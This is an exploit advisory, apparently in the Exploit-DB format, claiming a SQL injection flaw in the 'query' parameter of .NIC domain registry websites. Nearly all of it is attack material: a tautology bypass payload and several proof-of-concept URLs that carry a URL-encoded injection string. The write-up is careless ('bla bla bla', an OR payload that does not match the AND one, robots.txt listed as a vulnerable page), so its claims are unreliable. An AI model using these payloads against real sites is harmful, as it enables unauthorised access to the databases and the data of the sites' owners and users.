# Exploit Title: .NIC SQL Vulnerability
# Google Dork: N/A
# Date: 02/01/2018
# Exploit Author: Ozan  Agdepe
# Vendor Homepage: http://nic.ms & http://nic.ac
# Tested on: KaliLinux_X64/Win 7-8-10_x64

########################

# Exploit Author: Ozan Agdepe
# Email: agdepeozan@gmail.com
# Author web: Agdepe.net
# Author twitter: @OAdepe
# Author GitHub: https://github.com/0z4nAgd3p3

# ###################

# SQL Injection Type: ByPass SQL İnjections
# Parameter: query
# Page: /news-item-1?query= & /robots.txt?query= & /hello-world/images/images?query= bla bla bla...
# Attack: query' OR '1'='1' --
# Description:
# The vulnerability allows an attacker to inject sql commands....

# Proof of Concept:

#1)
http://localhost/robots.txt?query=query%27+AND+%271%27%3D%271%27+--+
http://localhost/news-item-1?query=query%27+AND+%271%27%3D%271%27+--+
http://localhost/faqs?query=query%27+AND+%271%27%3D%271%27+--+

#####
# query%27+AND+%271%27%3D%271%27+--+